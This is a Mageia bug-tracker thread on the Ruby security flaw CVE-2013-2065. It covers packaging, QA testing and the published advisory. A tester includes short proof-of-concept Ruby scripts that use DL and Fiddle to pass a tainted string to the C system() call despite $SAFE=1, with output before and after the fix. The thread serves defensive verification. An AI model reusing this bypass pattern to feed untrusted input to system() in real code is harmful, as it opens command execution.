| Summary: | ruby new security issue CVE-2013-2065 | ||
|---|---|---|---|
| Product: | Mageia | Reporter: | David Walser <luigiwalser> |
| Component: | Security | Assignee: | QA Team <qa-bugs> |
| Status: | RESOLVED FIXED | QA Contact: | Sec team <security> |
| Severity: | normal | ||
| Priority: | Normal | CC: | fundawang, sysadmin-bugs, tmb |
| Version: | 3 | Keywords: | validated_update |
| Target Milestone: | --- | ||
| Hardware: | i586 | ||
| OS: | Linux | ||
| URL: | http://lwn.net/Vulnerabilities/551067/ | ||
| Whiteboard: | has_procedure mga3-64-OK mga3-32-ok | ||
| Source RPM: | ruby-1.9.3.p429-1.mga3 | CVE: | |
| Status comment: | |||
|
Description
David Walser
2013-05-17 20:01:06 CEST
David Walser
2013-05-17 20:01:14 CEST
Whiteboard:
(none) =>
MGA3TOO

Wait until mga3 released. I'll likely propose ruby 2.0 for mga4.

Status:
NEW =>
ASSIGNED
Funda Wang
2013-05-21 08:37:01 CEST
Whiteboard:
MGA3TOO =>
MGA2TOO
Funda Wang
2013-05-21 08:37:29 CEST
Whiteboard:
MGA2TOO =>
(none)

Please test ruby-1.9.3.p429-1.mga3

Assignee:
fundawang =>
qa-bugs

Funda could you remember to add info for QA please.

SRPM: ruby-1.9.3.p429-1.mga3.src.rpm
------------------------------------
lib(64)ruby1.9
ruby-doc
ruby-irb
ruby
ruby-tk
ruby-devel

Testing complete mga3 64

PoC for CVE-2013-2065: http://www.ruby-lang.org/en/news/2013/05/14/taint-bypass-dl-fiddle-cve-2013-2065

Before
------
Needs requires adding to the scripts, so..

```ruby
require 'dl'
require 'dl/import'

def my_function(user_input)
  handle = DL.dlopen(nil)
  sys_cfunc = DL::CFunc.new(handle['system'], DL::TYPE_INT, 'system')
  sys = DL::Function.new(sys_cfunc, [DL::TYPE_VOIDP])
  sys.call user_input
end

$SAFE = 1
my_function "uname -rs".taint
```

When run in irb it outputs..

```
irb(main):011:0> my_function "uname -rs".taint
Linux 3.8.13-desktop-1.mga3
=> 0
```

Also, for fiddle, adding require 'fiddle'..

```ruby
require 'fiddle'

def my_function(user_input)
  handle = DL.dlopen(nil)
  sys = Fiddle::Function.new(handle['system'], [Fiddle::TYPE_VOIDP], Fiddle::TYPE_INT)
  sys.call user_input
end

$SAFE = 1
my_function "uname -rs".taint
```

Outputs..

```
irb(main):010:0> my_function "uname -rs".taint
Linux 3.8.13-desktop-1.mga3
=> 0
```

After
-----
Using the same scripts in irb

```
irb(main):011:0> my_function "uname -rs".taint
SecurityError: tainted parameter not allowed
        from /usr/share/ruby/dl/func.rb:92:in `call'
        from /usr/share/ruby/dl/func.rb:92:in `call'
        from (irb):7:in `my_function'
        from (irb):11
        from /usr/bin/irb:12:in `<main>'
```

And..

```
irb(main):010:0> my_function "uname -rs".taint
SecurityError: tainted parameter not allowed
        from (irb):6:in `call'
        from (irb):6:in `my_function'
        from (irb):10
        from /usr/bin/irb:12:in `<main>'
```

So CVE is confirmed and is now closed.
claire robinson
2013-05-24 15:44:44 CEST
Whiteboard:
(none) =>
has_procedure mga3-64-OK

Testing complete mga3 32

Validating

SRPM: ruby-1.9.3.p429-1.mga3.src.rpm

Advisory TBC

Could sysadmin please push from 3 core/updates_testing to core/updates when the advisory has been added.

Thanks!

Keywords:
(none) =>
validated_update

Advisory:
========================

Updated ruby packages fix security vulnerability:

Vulnerability in DL and Fiddle in Ruby before 1.9.3p429 where tainted strings can be used by system calls regardless of the $SAFE level set in Ruby. Native functions exposed to Ruby with DL or Fiddle do not check the taint values set on the objects passed in. This can result in tainted objects being accepted as input when a SecurityError exception should be raised (CVE-2013-2065).

References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2065
http://www.ruby-lang.org/en/news/2013/05/14/taint-bypass-dl-fiddle-cve-2013-2065/

Update pushed:
https://wiki.mageia.org/en/Support/Advisories/MGASA-2013-0155

Status:
ASSIGNED =>
RESOLVED